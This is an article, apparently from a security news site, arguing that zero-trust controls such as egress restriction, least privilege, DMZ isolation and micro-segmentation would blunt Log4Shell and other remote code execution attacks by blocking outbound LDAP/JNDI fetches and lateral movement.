How would zero trust prevent a Log4Shell attack?

There is a seemingly trivial solution to any remote code execution attack, namely: do not to let the inbound traffic match the pattern that triggers the vulnerability of the server. Easy to say, but hard to do. There are almost endless variations of traffic patterns that could trigger the critical severity Log4j vulnerability.

zero trust Log4Shell

As a result, malicious patterns of inbound traffic are extremely hard to detect. At the same time, outbound traffic caused by a Log4Shell attack site is easily detectable. Because this kind of traffic is always considered suspicious as it targets random internet sites with a special protocol, according to the zero-trust model it should not be allowed.

Outbound traffic to a random internet site is a peculiarity of Log4Shell attacks that other arbitrary code execution attacks do not necessarily have. This peculiarity should help the prevention of exploitation not only when network defense is based on the perimeter-less zero trust network architecture (ZTNA) security model, but also if it is a perimeter-based castle-and-moat defense

The consequence of a Log4Shell attack is that the exploited server tries to download code from an internet site owned by the attacker. If the download is successful, the server runs the code, usually to grant a backdoor to the attacker. Some questions arise. How could the access of random internet sites be successful? And even if it succeeded, how was the attacker able to access the opened backdoor?

Zero trust renders Log4Shell harmless

Unlike zero trust, which requires micro segmentation, traditionally demilitarized zones (DMZ) are the best practice to isolate external-facing servers of the organization from both the local area network (LAN) and from larger, usually untrusted networks such as the internet. Access of services running on the servers of DMZ, except public services such as web services, should be forbidden or strictly authenticated from the direction of the internet.

As there are only a few legitimate reasons why a server in a DMZ would want to access the internet, this kind of traffic should also be strictly controlled. Even if a Log4Shell vulnerability is exploited in the server, it cannot download and later run any malicious code, as the outgoing traffic from the DMZ to the internet would have been prohibited. A strictly defended DMZ could prevent a Log4Shell attack, as exploited servers mostly use protocols (LDAP, JNDI) to download the malicious codes, but it is hard to imagine legitimate reasons to permit the use of these protocols to access anything, or at least a random site on the internet, especially from a DMZ.

Zero trust specifies and generalizes the methods and approaches that have already been applied in any DMZ. Zero trust requires, for instance, the least privilege principle. Servers could access only the strictly necessary resources – e.g., an update server – on the internet with a specific address, port, and protocol. This way of working does not lead to serious administrative costs for the security team, as there are only a few reasons why a server needs to access the internet, and the firewall rules created because of these reasons are rarely changed.

If, for whatever reason, access to trusted resources cannot be tightened, protocol enforcement and content filtering become priorities. Least privilege also means that a resource can only be accessed with the necessary protocol. Even if an attacker runs a server on a port that is assumed to be allowed from a DMZ (e.g., HTTPS), downloading the malicious code will fail when Log4j uses another protocol (LDAP, JNDI) than the expected one (HTTPS). Even if the necessary protocol is used, content filtering can detect the malicious codes.

Zero trust defends against RCE attacks

A remote code execution attack does not necessarily require an external server on the internet from where the malicious code is acquired. In these cases, the code is injected into a legitimate, but malformed request that exploits a vulnerability. It is almost impossible to detect a pattern that exploits a zero-day vulnerability, so we should focus on the consequences of running arbitrary code on the exploited server.

If the goal is simply to bring the service down immediately after exploitation, the attacker will succeed, as there are several ways to do so only on the privilege level of the exploited service. However, privilege escalation very frequently follows an RCE, which means that a suitable patch management process is essential to minimize this threat.

It is likely that one of the next steps will be lateral movement, i.e., trying to infect other servers of the organization. This requires the conversion of the exploited server to a command-and-control (C&C) machine that requires permanent access. If we follow the principles of zero trust, only the public service of a server in the DMZ can be accessed from the internet. Accessing any other services on the server is usually either not permitted or is permitted only after strong authentication. If this is indeed the case, the C&C server cannot be accessed by the attacker.

Even if the public service itself can be used to control server, eavesdropping and lateral movement cannot be performed if the server is isolated by micro segmentation in line with zero-trust principles. Data leakage is still a serious threat if the attack is targeted and the exploited service can be used to leak data, but by applying zero-trust principles this issue can be localized.

Think global, not local: One-by-one solution is ineffective

Log4j developers have implemented a built-in solution to control the outgoing LDAP and JNDI connections. This could be a solution for those who are affected by these attacks in the short term, but it cannot save time in the long term, as other software have or will have similar issues. These kinds of security issues are the result of the way the software industry now works. The rapid development cycles, the release pressure, the missing security mindset, the low test coverage, the lack of security testing, among others, can all be the cause of security issues.

Security experts, such as penetration testers, hackers, and crackers, think differently than developers. Developers mostly focus on the happy paths, whereas security experts focus on edge and corner cases and how to exploit them, although the goal of a penetration tester and a cracker are completely different.

Though controlling outgoing connections from a server generally is a good idea, implementing it separately in all applications is presumably neither the most effective nor the fastest way. Different implementations of a functionality like this may have different issues that increase complexity, especially if the goal is a comprehensive solution. Even if the developers of a wide variety of software projects implement similar controls, it would require significant work.

Maintainers then need to update a huge amount of software, which is a risk, and simply not possible in many cases, especially in the case of large organizations and IT infrastructures. According to zero trust network architecture, there should be a policy enforcement point (PEP), which is responsible for enabling or terminating connections between a subject and an enterprise resource. Using a PEP any outgoing connection from DMZ to the internet can be controlled carefully if they are not disabled.

Always strictly control your resources

The solution, at least until an era of security by design arrives, is to strictly control resources, where everything is considered as a resource, even if it is on the internet. To avoid the consequences of vulnerabilities such as Log4Shell, we must control how resources can be accessed, how they can access other resources, and how these access rules can be enforced on the network using the least privilege principle and other principles of zero trust.

Don't miss